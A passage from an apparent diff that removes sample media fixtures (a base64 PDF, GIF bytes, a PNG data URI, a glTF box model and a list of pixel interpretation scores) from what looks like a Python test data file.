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", -} -BINARY_IMAGE = ( - b'GIF89a=\x00D\x00\xf7\xa8\x00\x9a,3\xff\xc0\xc0\xef\xc0\xc0uXg\xfc\xf9\xf7\x993\x00\xff\xec\xec\xff\xa0\xa0\xe5\xcc\xbf\xcf\x9f\x87\x0f\xef\xef\x7f\x7f\x7f\xef\x0f\x0f\xdf\x1f\x1f\xff&&_\x9f\x9f\xffYY\xbf??5\xa5\xc2\xff\xff\xff\xac\x16\x19\xb2&\x00\xf8\x13\x10\xc2& \xdf`PP\x84\x9b\xf8\x03\x00\xb5\x0b\x0c\xdf\x0f\x00>\x9a\xb5\x87BM\x7f`P\xd2\xa5\x8f\xcc\x19\x00\xa5,\x00\xec\xd9\xcf\xe5\x0c\x00\xeb\t\x00\xff\xd9\xd9\xc7\x0c\x0c\x0f\x0f\x0f\xffyy~MZ\xfb\t\x08\xe5M@\xfb__\xff33\xcf\x90x\xf2\xe5\xdf\xc3\x06\x06\xbf\t\x08\xff\xb3\xb3\xd9\xb2\x9f\xff\x06\x06\xac)\x00\xff\xc6\xc6\x0c\t\x08\xf9\xf2\xef\xc9s`\xb8#\x00\x9f/\x00\xff__\xff\x8c\x8c\xc5\x1c\x00\xdf33\xffpp\xcf\x19\x19\xc0\x13\x10\xbf\x90x\xf7YY\xff\xf6\xf6\xe7??\xd7&&\xefLL2& \xdf\xbf\xaf\xbf\xbf\xbf???\xc5M@cn\x81_\x00\x00___\xcb00\xd8\x13\x00YC8\x80\x80\x80\xf3RRsVH\xc490\x10\x10\x10\x917@\xf2\x06\x00\xcf@@\xca\x86pooo\xa3!&\xc1\x1d\x18\xcf//\x1f\x1f\x1f\xdf\x00\x00\xd2\x16\x00\xcb\x90x\xbf\x1f\x00\x19\x13\x10\xf3\xd0\xd0\xe399&\x1d\x18Yy\x8e\x8f\x8f\x8f\xff\xa9\xa9\xcb\x13\x13\xbf00SF@\xb6& >\x1d\x18\xfb\xdd\xdd@@@\x99\x93\x90\xff\xbc\xbc\x7fPP\xaf\xaf\xaf\xc6VHzsp\x93& \xb7pp\xb3\x86ptPP|pp\xafOO\xd0\xd0\xd0\xef\xef\xefL90\xbc\xa9\xa0o0(\xeb\xb0\xb0\xff\xe0\xe0\xff\xd0\xd0\x870(K0(\xc9|h\x9f__lct\xebFF\xcf\xcf\xcf\xe0\xe0\xe0b& \xff },(@0(\xa9\x93\x88\xa6|h\x1f\xdf\xdf\xd5\xac\x97\xe2\xc5\xb7\xc7`POOO\x9cyhppp\xff\x80\x80\xff\x96\x96\xd7``\xcc\x99\x7f,\xb0\xcf\xbf\x00\x00\x00\x00\x00\x00\xff\xff\xff\x00\x00\xffff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00!\xf9\x04\x01\x00\x00\xa8\x00,\x00\x00\x00\x00=\x00D\x00\x00\x08\xff\x00Q\t\x1cH\xb0\xa0\xc1\x83\x08\x13*\\\xc8\xb0\xa1\xc0\x1b\x07\x0c8\x9cHq\xa1\x89\x14\xa72F\xac\xc8\xb1\xa2\t\x1f\x19Cj\x94\xd8\xb1$B\x03\x07D\xaa\x1ci\xb2%*#3V\xcad\xe9\xb2\xa2\x9d 3s\x9e\xdaX\x93!"\x8c:\x83\xf2\xeci\xf0c\xd0\xa3!\x87\x12E\x89\xb4iR\x92.a:\x9d\xfa\xb4\xe5\x0c\x9cT\xb3\xee\x84:\xf1\x06P\xad`\x95*4\n\xb6l\xd5\x84\x06>\x99]\x1b\xb2\xc5\x9c\x83F\xda\xb0\x9d{\xe4\x84\x00\x83W\xe7\xaeM\xe2f\xd4\xa8\xbb\x03\xbd\xea5kE\x88_\xbf\x80\x0fy\x1a\\\xb6\x08\x92\xc3\x87\x01\x070\xe5\x00\x02\xe3\xa9-\x80\xc4\x80\x1cY\xe0dS\x94-_\x0ezd3\xe7\xce\xa8>\x83\x0e=Zf\x92\x13\xa7Gm\x18 \xe1\xaf\xe7\xd5\xb8+\xb7\xceX8\xf6(\xda\xa2D\xd9N\x8d\xbb\xb8n\xc6\x8e}\x8f\xfa\x12<\xf8\xf0\xcf\x11\x1a\x14\x07}|mf\xdf\x00\x9elP\xd1\\\xb8dSaJ\x95\xffz }zu\xadiLs\xa6\xb0&8\x80\x01\xdd\x9f\x9b\x8a ^<\xf9\xe9\xac\xa9:\x82\x1d{\x83\x84\xe6\xef\xc5\xf7\x1d}\xf5\xd9W\x9eq\xa2\x1d\x95\x84a\xb1\xa9\xb0\x01\x00\xdd\x05\xd8\x9c|\x04\x16X\x8a\x02\x0b0\x80\x9f\x0b=\xe8\x94\\l\x1et \n\x00\x10\x02\x08\xdf\x84\x03ZX \x86\x1a\x16W\x03\x87+]\xe7[\x06\x00\x96\xe8\xde\x89\xce\xa5\xa8\xe2\x8a\x19N\xf7b\x87\x19\xa5\x17\x1b\x05\xa3P\x10\xa1\x8d#\xe2X\x9b\x8e;\xf2\xd8"n/\xd6\xd5\xdf\x13\xa2x\x80$\x89\x11\x9e\xd8\x81\x16\x146\xb9#\x8b\xd3\xf9\xe6\xc1\x7f\xa2\x0cp\xe5\x99\x12\xa8\x80\xdad\x15zi!\x98\xab\xf9Ff\x99gvG$g\xdf1\xa0\x80\x9bM\xc2\t\x19\x00\x19p\xd9\x9d\x99G6\xd7Hl\xdf\x99\xc2\xc8\x9e|~\t\x88)~Q@c\x99\xa3\x0cZg\x06\x00\xf8\x96\xa8)\x0c,\xc0h\xa3\x05^\x02\xe9(\x93Rji\x84\xcb)\'\x1fn\x9d~\nj)\xa3\x0e\xffZis\x84\x06\xd7\x81\xaak\xae\xc6\x01\x07\xa0\xb5\xfa*\xac~\xc9z\xaa\x04\x03l\x80+b\xb7\x81V@\x01$\xac\xd6\xe9\xab\xb1\xd2:kpj\x0ep\xe7\xb1\xab\x9aRA\x01!\x14\xd7\xc0\x03\x8dF\x1b\xdc\x00\xd3\x8ar-\xb6\xc8\x12\x07Z\t\x15\xf0:\xdd\xb7n\x8ak\xaa(\x1ddz\xac\x14\x86\x80\x92+~\xf8\xc1\xbb\xa3\xbc\xe4\xae\xe1\x01\xbaR\xfcAG\'\\\xa4\xab\x1a\xbf\xef\x82k\xa1\xbc\x03\xa3\xeb\xd7\x1d\xa4T\xcc\x87\xc2\xc5qP\x02\xc3\xab\xf9+\x9e\xb8OH\xec\xd7\x1bYTL\x8a\x1f~\xa1\x91\xecj"\xd8\xc01n\xfe\x8e\xdaA\x06\xe7\xa2;\t)Q\xb0AJ\x15\\\xa8\xbc2h!\x14\xe0\xee\xcb\xa05\x10\xc6\xa8"s&\x07\n\x13L\xb0sA\x0b\x9b\xa2\x81\x08"h\xf02\x0f\x15\xe0\x964g2\xa8\xd1D\xd3\xa4\xe8\x01\xf5t\x1c\x14`\xc6\xcb\xcbN\x11\xe7\xd6\x87]@\xca\xd7\x8f\x90\xf2\x01\x08#\x10t\x80$\xc5\x99\xc1-\xc7?\x14\xff@\xc6\xdal\x8f\xe2\x04)b0\xb1\t)}\x84\x12J&\x04\x05\x02\xc5\x18\xb8\xd9P\xc0\x0f\x1c\x93`5h\x81_\xb0H(j\x98\xacD( \xc0`P\xc5\x8f\x83\xa6\xc1\xb6;l1\x9d\x06\x1bk\x9d4\x18:(\x1e\n\x15&sR\xb7A9\xc0Q\xf1 \x18X\x00Z\xdf<\x84\xa0:h$H^\x1cgC\\\xa0\xdc\x10\x9a\xc8\xae8\x11gdQ\x07\x01\x07!\x10\n\x11W| {\xef\xa6\x90\xb0m\x01"T B\x01<\xa8\xed\xba_X|pE\x1e\xa7\xc9\xe0D\x19\xce\xcb\xbe\x04\xf5\x08\x11\x80@\x02\xf1+\xce}\t!\xecP\xc1\x0ed\xb8\xdc\xf9\x86\xa0\x88\x8aQA\x06\x90\xc1\x02\xfc\xf2G\x83\x1c4\xc4~\xf8\xcb\x1f\xf7^v\x98D\x98\x0c\x07\xca\x1b\xc5\x05\xba\x90\xbfP`Bt\x14\x81`\x07\'\xc8/\xbf\xc8@\toC\x01)\x9c\x00\xbb\x0e\xd2\xcd$"\x94\xa0\xef\xf0\xe3\x978\xe0l\x02^ \x05\x07\xf3\x97\x00\x04\xd0\xaf%1t\xde\x0b|X\xb0\x820\x8db\x0f\xa4`\xc2\x04\x16@\x8a\x0e\xce\x8f(\x02\t\xa2\xec\x86X\xc4\xb5\x15"\x898\xc4A\xfc\x1a\x08\xc5\x82HQqT\xc4\xdc("A\n<\x08\x02\x05\x94\x90\x1d\r@\xd8E\x83|1\x14T\xbc\x80\x0e>@\n\x14\x88An\xa0\xbb]\x1b\x13\xf2F\xd9Y\xc2dg\xe8\xe1\x1e\x1d\xd2\xc7P\xa0\x10\x07\x84\xf8\xe1 \x1fx\xbf\xfc\x11\xa1\x12\x90XdG\x82\xb8FI\x02q\t/\xb4\xa4&[\x12\x10\x00;', - "png", -) -ARRAY_TO_BASE64_IMAGE = ( - "data:image/png;base64," - "iVBORw0KGgoAAAANSUhEUgAAAD0AAABECAIAAAC9Laq3AAAIzElEQVR4nNXab0wb5x0H8C8x8R9ixCmuCLZi5dIlJi+gPg2kAC+KSaaJpXFLm7XJQiU7SkervcjopiqaFAXTok1tOsVkb5JmUY3UhiRSJ1YzGtGRXF4MO1OuMsMv4MKUs2CGWLg6zwRjC5S9OOq/5/NfEu37Ah333D334Xh+D8fjq3j69Cn+D7Nty6/gcmFoCMFgeXut2ML7zbJwOBLitjYcPQqNpix9b42bZeF0gmVFmsqkL7c7GMToKCYncxxWsr587kgEExNwOgs4pQR9mdwTExgdxepqMecWpS/ZPTWFmzfLMF0UqC/BLVF8RSdvfVHuPIuv6OShL9BdRPEVHUl9Ie7RUUxMFFl8RSeLPj+3ywWns+x/qwtIhj6XeyuKr+gk6bO7g0HcugWP51nCcmY9GsX585Uvvlgp0hiJwOnExMQzV+XI0uwsxzAHTp0iRNzPpfhyhff751yulaQCS3I/9+ITy8ry8pzLxS8upu2vBACfDw4H/P7n4MqetXCYY5ilLFNCJQBwHGw2GAxoakJ19TPViWU9Gl3wehemp9djsWzHJI0TlgXLPnf90uzsnMslIRaSUZfPT8/7/TM0vbayktm0ukNNm7tpc/cn3S8Le8TmQTxrfbbiEzJ24l3a3B3ZkcLI4hay9Xrp4gOwsNfwzYn3MvenuOn2dpLjSJ8v5ZCt0QvFxzGMaOvDhqb7h15949qFhw3Nogck3B6jsYOmAVgcDpvNtqX6helpjmFEiy9Yq/3q9AfTBzsAHLzzddrwiCex7sMThLAxZLXu5Tjr559ze/akH86yGB4GTSMcLk68zHHu69ezzRirO9QfX7wpoKWTdb2q7Hre7/c4nd7xcdEZ46755OoO9X/21me7wWmRrEtgyGod6erqtdt77XYiFEppE0ZOUxMaGqBQSHQiXXzuQ+ZvTrz3fa1u96PZfMRCcq8Phgii32YjOc7W18fX1KQ3MwyGh8EwiEYzz12PRjmGcQ8PZ0MPDlz98syH39fq8hfn6xYipY/FRPUL09Pu4WHRGSNYqxW+zmWZLkSjepIYloWtx+apX5qdzVZ8qzvUX5zpt3025j5kLug27wz43750vkh3nvqZe/dEi899yGz7bOz+oVcB5Ine732gehJ+49qF/p5XXrpPl+TOrc+Sv5z+IM/pQsjOgH+/l/mk++UO5/W0poSb8nhqeD7/ToXk1D9saBocuPqvgyYABaFNzi81AfEnFiS7iVDI3ttbBB1J+pHXXovvDNZqBweuXhr481xD88Le+vx72+d9cObcO8eufSpxTMo4sQ4NcSTZZ7MVre+12+PffnHmw4KmCwD7vczZ94//+twv93vFn1viSR/fRChk6+8vWu8jyfh2QWhhKAPY/SivtZp0N1cDrqZUfUFRPQn/7Mbls+8fL+isdPf4Pozvg18NpN77MiETUT0J7/cygvjIjStVT0TmTYmku7VhAFhMqntB/4gkLQ5HidbkvHT/LoAjN65ITBoSSXe3zkMbhiZj2Yf0+RynTpVFvzPgP3PunTy5aopqGBmps1rT9qe7X4jAzIIMQTQl6hvv3+2+dL6/55Wc04UQNUX91WR6026/QhCEySTlzidF6HcG/AB6/vCbljsFrPmPkuSA3U7TtN1uX6Ko5CZxN1eDZVWOTvPXH7zzdUHczVDUIE3Hv5vgOGGjkiCQzT2pxz0yr84l9DsD/n3eB7aeI29f6itMDAC4s77G87zFYrl48SIANUURJlOzx6M2GrG5/n3vHlJHD6MFo8NP57IOdNFwe/bwBEFNTdFFMDPSp6+b+m+E53kAFRUVNputry/x84vf74YA1FFM6hGV5b6AwwinAQBIn4+amiqHGVAplwAqaUzHwnxyu7hbsYG2eawo4Nqd+xKxSixWY7Y87zlsRqavY+eXhG2PxwNge5Cbvm4Psh5h5zYAaG+Hw4GkRwsAZAiGZbAvgNHmuEbDYwCI5fGbyT+yehIAx3E0TdtsNgDNBjK2wnP0yPzkbST+n7dYpijqIkXZgDjf5EOwCowOURnaFrJeo20BJA9NpExiA6l4q1Om32XwzLA+X0dHB4AfG0itpkauJkhTV7WORPI6hNFoHAKGAAsQ1x9lMf4jeHchrEDbPKoz1mqiMoTl0BX2cCGebfo65VudMsPmck2TgYwPlV8d6yRNXRoDFT848XlaLMyf/PnrX43TAI62Un+qJ7VOWhHkAUzuhncX5OtoDMAQTOj9arj0CFahJ/XPH50KqtAQ2zTEBstlE1doCIXZtL3VmLwzHIme/OhyZAMff2Q73fOuTK5MOUVw+xl6kaHDkejopEddpTT/0IXGNSXo/Wowus3nLXUU1TGE5VhRQL6O1gXUp34olOze3kp9W0+urK4dA6K3bqeTVUr5T1rkh1sqVCIrRxoDpW/rTBOnuDdia4+n3YFp90ZsTeT8H/TLKvgILFchJoN8A7owDEEoNtKPj7srNMQFfd3fPDMAfnG4pWfSg0ii/+2tlOJ4p6i4WkuSpi55NZHZlOIWkqc+W1+Zbjd14HeeGWFbrVKO6euE0SIzkEpr1zaNyP/RKk2dvrVTKD6JiHxeXLp+061S/lZf9x3Ltbe3ezyeUCj0D7Np3TOTXHzJkasJXbMpufgKc5euF9wRA3mE5SwWi8Ph6O3tHRwc/Ofve0XvsUyurG1s2dXYIjqURZN1PVYmV+qaTLsaW0T1wVYjTx2onXDX/t1dGRH5wQD8GwBgtVoBEMJDnBhaoviKcefUb6gUi0fbA4dbsunnqhIUnufVqnRZzuIr3l2KPry6Joh5nnc4HM31ZLJY22TKWXwSKfj9KolxL4tEBb1LX6cwm8aCfL9jpKamhiAIn8/XZ+0ytxoLKr5yunPq42HnH58cuCxsazXE2KdnaxtbdE2m4qBpKen9wZz6nj8OfcdyapVyxHHZ1HW80OKTSBne15TQhyPRgIw4aD6xJ/PDrdJStvdjM/WlF59Eyvw+8kZsbX7ydtjPlaX4JLKV761vZf4H0dLrJY2D0p4AAAAASUVORK5CYII=" -) -BASE64_MODEL3D = { - "name": "Box.gltf", - "data": "data:;base64,ewogICAgImFzc2V0IjogewogICAgICAgICJnZW5lcmF0b3IiOiAiQ09MTEFEQTJHTFRGIiwKICAgICAgICAidmVyc2lvbiI6ICIyLjAiCiAgICB9LAogICAgInNjZW5lIjogMCwKICAgICJzY2VuZXMiOiBbCiAgICAgICAgewogICAgICAgICAgICAibm9kZXMiOiBbCiAgICAgICAgICAgICAgICAwCiAgICAgICAgICAgIF0KICAgICAgICB9CiAgICBdLAogICAgIm5vZGVzIjogWwogICAgICAgIHsKICAgICAgICAgICAgImNoaWxkcmVuIjogWwogICAgICAgICAgICAgICAgMQogICAgICAgICAgICBdLAogICAgICAgICAgICAibWF0cml4IjogWwogICAgICAgICAgICAgICAgMS4wLAogICAgICAgICAgICAgICAgMC4wLAogICAgICAgICAgICAgICAgMC4wLAogICAgICAgICAgICAgICAgMC4wLAogICAgICAgICAgICAgICAgMC4wLAogICAgICAgICAgICAgICAgMC4wLAogICAgICAgICAgICAgICAgLTEuMCwKICAgICAgICAgICAgICAgIDAuMCwKICAgICAgICAgICAgICAgIDAuMCwKICAgICAgICAgICAgICAgIDEuMCwKICAgICAgICAgICAgICAgIDAuMCwKICAgICAgICAgICAgICAgIDAuMCwKICAgICAgICAgICAgICAgIDAuMCwKICAgICAgICAgICAgICAgIDAuMCwKICAgICAgICAgICAgICAgIDAuMCwKICAgICAgICAgICAgICAgIDEuMAogICAgICAgICAgICBdCiAgICAgICAgfSwKICAgICAgICB7CiAgICAgICAgICAgICJtZXNoIjogMAogICAgICAgIH0KICAgIF0sCiAgICAibWVzaGVzIjogWwogICAgICAgIHsKICAgICAgICAgICAgInByaW1pdGl2ZXMiOiBbCiAgICAgICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAgICAgImF0dHJpYnV0ZXMiOiB7CiAgICAgICAgICAgICAgICAgICAgICAgICJOT1JNQUwiOiAxLAogICAgICAgICAgICAgICAgICAgICAgICAiUE9TSVRJT04iOiAyCiAgICAgICAgICAgICAgICAgICAgfSwKICAgICAgICAgICAgICAgICAgICAiaW5kaWNlcyI6IDAsCiAgICAgICAgICAgICAgICAgICAgIm1vZGUiOiA0LAogICAgICAgICAgICAgICAgICAgICJtYXRlcmlhbCI6IDAKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgXSwKICAgICAgICAgICAgIm5hbWUiOiAiTWVzaCIKICAgICAgICB9CiAgICBdLAogICAgImFjY2Vzc29ycyI6IFsKICAgICAgICB7CiAgICAgICAgICAgICJidWZmZXJWaWV3IjogMCwKICAgICAgICAgICAgImJ5dGVPZmZzZXQiOiAwLAogICAgICAgICAgICAiY29tcG9uZW50VHlwZSI6IDUxMjMsCiAgICAgICAgICAgICJjb3VudCI6IDM2LAogICAgICAgICAgICAibWF4IjogWwogICAgICAgICAgICAgICAgMjMKICAgICAgICAgICAgXSwKICAgICAgICAgICAgIm1pbiI6IFsKICAgICAgICAgICAgICAgIDAKICAgICAgICAgICAgXSwKICAgICAgICAgICAgInR5cGUiOiAiU0NBTEFSIgogICAgICAgIH0sCiAgICAgICAgewogICAgICAgICAgICAiYnVmZmVyVmlldyI6IDEsCiAgICAgICAgICAgICJieXRlT2Zmc2V0IjogMCwKICAgICAgICAgICAgImNvbXBvbmVudFR5cGUiOiA1MTI2LAogICAgICAgICAgICAiY291bnQiOiAyNCwKICAgICAgICAgICAgIm1heCI6IFsKICAgICAgICAgICAgICAgIDEuMCwKICAgICAgICAgICAgICAgIDEuMCwKICAgICAgICAgICAgICAgIDEuMAogICAgICAgICAgICBdLAogICAgICAgICAgICAibWluIjogWwogICAgICAgICAgICAgICAgLTEuMCwKICAgICAgICAgICAgICAgIC0xLjAsCiAgICAgICAgICAgICAgICAtMS4wCiAgICAgICAgICAgIF0sCiAgICAgICAgICAgICJ0eXBlIjogIlZFQzMiCiAgICAgICAgfSwKICAgICAgICB7CiAgICAgICAgICAgICJidWZmZXJWaWV3IjogMSwKICAgICAgICAgICAgImJ5dGVPZmZzZXQiOiAyODgsCiAgICAgICAgICAgICJjb21wb25lbnRUeXBlIjogNTEyNiwKICAgICAgICAgICAgImNvdW50IjogMjQsCiAgICAgICAgICAgICJtYXgiOiBbCiAgICAgICAgICAgICAgICAwLjUsCiAgICAgICAgICAgICAgICAwLjUsCiAgICAgICAgICAgICAgICAwLjUKICAgICAgICAgICAgXSwKICAgICAgICAgICAgIm1pbiI6IFsKICAgICAgICAgICAgICAgIC0wLjUsCiAgICAgICAgICAgICAgICAtMC41LAogICAgICAgICAgICAgICAgLTAuNQogICAgICAgICAgICBdLAogICAgICAgICAgICAidHlwZSI6ICJWRUMzIgogICAgICAgIH0KICAgIF0sCiAgICAibWF0ZXJpYWxzIjogWwogICAgICAgIHsKICAgICAgICAgICAgInBick1ldGFsbGljUm91Z2huZXNzIjogewogICAgICAgICAgICAgICAgImJhc2VDb2xvckZhY3RvciI6IFsKICAgICAgICAgICAgICAgICAgICAwLjgwMDAwMDAxMTkyMDkyOSwKICAgICAgICAgICAgICAgICAgICAwLjAsCiAgICAgICAgICAgICAgICAgICAgMC4wLAogICAgICAgICAgICAgICAgICAgIDEuMAogICAgICAgICAgICAgICAgXSwKICAgICAgICAgICAgICAgICJtZXRhbGxpY0ZhY3RvciI6IDAuMAogICAgICAgICAgICB9LAogICAgICAgICAgICAibmFtZSI6ICJSZWQiCiAgICAgICAgfQogICAgXSwKICAgICJidWZmZXJWaWV3cyI6IFsKICAgICAgICB7CiAgICAgICAgICAgICJidWZmZXIiOiAwLAogICAgICAgICAgICAiYnl0ZU9mZnNldCI6IDU3NiwKICAgICAgICAgICAgImJ5dGVMZW5ndGgiOiA3MiwKICAgICAgICAgICAgInRhcmdldCI6IDM0OTYzCiAgICAgICAgfSwKICAgICAgICB7CiAgICAgICAgICAgICJidWZmZXIiOiAwLAogICAgICAgICAgICAiYnl0ZU9mZnNldCI6IDAsCiAgICAgICAgICAgICJieXRlTGVuZ3RoIjogNTc2LAogICAgICAgICAgICAiYnl0ZVN0cmlkZSI6IDEyLAogICAgICAgICAgICAidGFyZ2V0IjogMzQ5NjIKICAgICAgICB9CiAgICBdLAogICAgImJ1ZmZlcnMiOiBbCiAgICAgICAgewogICAgICAgICAgICAiYnl0ZUxlbmd0aCI6IDY0OCwKICAgICAgICAgICAgInVyaSI6ICJkYXRhOmFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbTtiYXNlNjQsQUFBQUFBQUFBQUFBQUlBL0FBQUFBQUFBQUFBQUFJQS9BQUFBQUFBQUFBQUFBSUEvQUFBQUFBQUFBQUFBQUlBL0FBQUFBQUFBZ0w4QUFBQUFBQUFBQUFBQWdMOEFBQUFBQUFBQUFBQUFnTDhBQUFBQUFBQUFBQUFBZ0w4QUFBQUFBQUNBUHdBQUFBQUFBQUFBQUFDQVB3QUFBQUFBQUFBQUFBQ0FQd0FBQUFBQUFBQUFBQUNBUHdBQUFBQUFBQUFBQUFBQUFBQUFnRDhBQUFBQUFBQUFBQUFBZ0Q4QUFBQUFBQUFBQUFBQWdEOEFBQUFBQUFBQUFBQUFnRDhBQUFBQUFBQ0F2d0FBQUFBQUFBQUFBQUNBdndBQUFBQUFBQUFBQUFDQXZ3QUFBQUFBQUFBQUFBQ0F2d0FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBSUMvQUFBQUFBQUFBQUFBQUlDL0FBQUFBQUFBQUFBQUFJQy9BQUFBQUFBQUFBQUFBSUMvQUFBQXZ3QUFBTDhBQUFBL0FBQUFQd0FBQUw4QUFBQS9BQUFBdndBQUFEOEFBQUEvQUFBQVB3QUFBRDhBQUFBL0FBQUFQd0FBQUw4QUFBQS9BQUFBdndBQUFMOEFBQUEvQUFBQVB3QUFBTDhBQUFDL0FBQUF2d0FBQUw4QUFBQy9BQUFBUHdBQUFEOEFBQUEvQUFBQVB3QUFBTDhBQUFBL0FBQUFQd0FBQUQ4QUFBQy9BQUFBUHdBQUFMOEFBQUMvQUFBQXZ3QUFBRDhBQUFBL0FBQUFQd0FBQUQ4QUFBQS9BQUFBdndBQUFEOEFBQUMvQUFBQVB3QUFBRDhBQUFDL0FBQUF2d0FBQUw4QUFBQS9BQUFBdndBQUFEOEFBQUEvQUFBQXZ3QUFBTDhBQUFDL0FBQUF2d0FBQUQ4QUFBQy9BQUFBdndBQUFMOEFBQUMvQUFBQXZ3QUFBRDhBQUFDL0FBQUFQd0FBQUw4QUFBQy9BQUFBUHdBQUFEOEFBQUMvQUFBQkFBSUFBd0FDQUFFQUJBQUZBQVlBQndBR0FBVUFDQUFKQUFvQUN3QUtBQWtBREFBTkFBNEFEd0FPQUEwQUVBQVJBQklBRXdBU0FCRUFGQUFWQUJZQUZ3QVdBQlVBIgogICAgICAgIH0KICAgIF0KfQo=", -} -SUM_PIXELS_INTERPRETATION = { - "scores": [ - [ - [ - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 1.0, - 0.9217332561281606, - 0.9217332561281606, - 0.9217332561281606, - 